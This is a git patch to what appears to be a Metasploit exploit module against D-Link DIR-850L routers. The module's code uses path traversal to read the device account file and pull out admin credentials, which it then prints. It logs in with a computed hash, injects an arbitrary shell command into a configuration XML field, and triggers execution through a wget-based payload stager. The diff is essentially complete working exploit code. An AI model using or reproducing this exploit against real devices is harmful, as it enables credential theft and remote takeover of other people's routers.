From af583e843c5e464e5cc29ec507ce9335a06d0a16 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Fri, 3 Nov 2017 06:21:59 -0400
Subject: [PATCH] Update dlink_850l_unauth_exec.rb
---
.../linux/http/dlink_850l_unauth_exec.rb | 40 +++++++------------
1 file changed, 15 insertions(+), 25 deletions(-)
diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb
index 8f05f151f1..70e1f8e5db 100644
--- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb
@@ -1,12 +1,7 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
- Rank = AverageRanking
+ Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
@@ -49,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
xml = "\r\n"
xml << "\r\n"
xml << "\r\n"
- xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n"
+ xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n"
xml << "\r\n"
xml << ""
uid = rand_text_alpha_lower(8)
@@ -68,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
parse = res.get_xml_document
username = parse.at('//name').text
password = parse.at('//password').text
+ vprint_status("#{peer} - Retrieved the username/password combo #{username}/#{password}")
return username, password
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
@@ -89,31 +85,25 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
- def hash_passwd(username, password, challenge)
- hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
- return hash
- end
-
- def login(username, hash, uid)
+ def login
+ username, password = retrieve_creds
+ uid, challenge = retrieve_uid
begin
- data = "id=#{username}&password=#{hash}"
+ hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
res = send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'POST',
- 'data' => data,
+ 'data' => "id=#{username}&password=#{hash}",
'cookie' => "uid=#{uid}"
})
- return res
+ return uid
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def execute_command(cmd, opts)
- username, password = retrieve_creds
- uid, challenge = retrieve_uid
- hash = hash_passwd(username, password, challenge)
- login(username, hash, uid)
+ uid = login
payload = "\r\n"
payload << "\r\n"
payload << "\r\n"
@@ -123,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
payload << " \r\n"
payload << " 1\r\n"
payload << " 604800\r\n"
- payload << " metelesku; (#{cmd};) & exit; \r\n"
+ payload << " #{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}) \r\n"
payload << " \r\n"
payload << " \r\n"
payload << " 1\r\n"
@@ -140,13 +130,15 @@ class MetasploitModule < Msf::Exploit::Remote
payload << "\r\n"
payload << ""
begin
+ # save configuration
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'ctype' => 'text/xml',
'data' => payload,
'cookie' => "uid=#{uid}"
- })
+ })
+ # execute configuration
res = send_request_cgi({
'uri' => '/pigwidgeon.cgi',
'method' => 'POST',
@@ -162,9 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
print_status("#{peer} - Initiating exploitation...")
execute_cmdstager(
- :flavor => :wget,
- :background => true,
- :nodelete => true
+ :flavor => :wget
)
end
end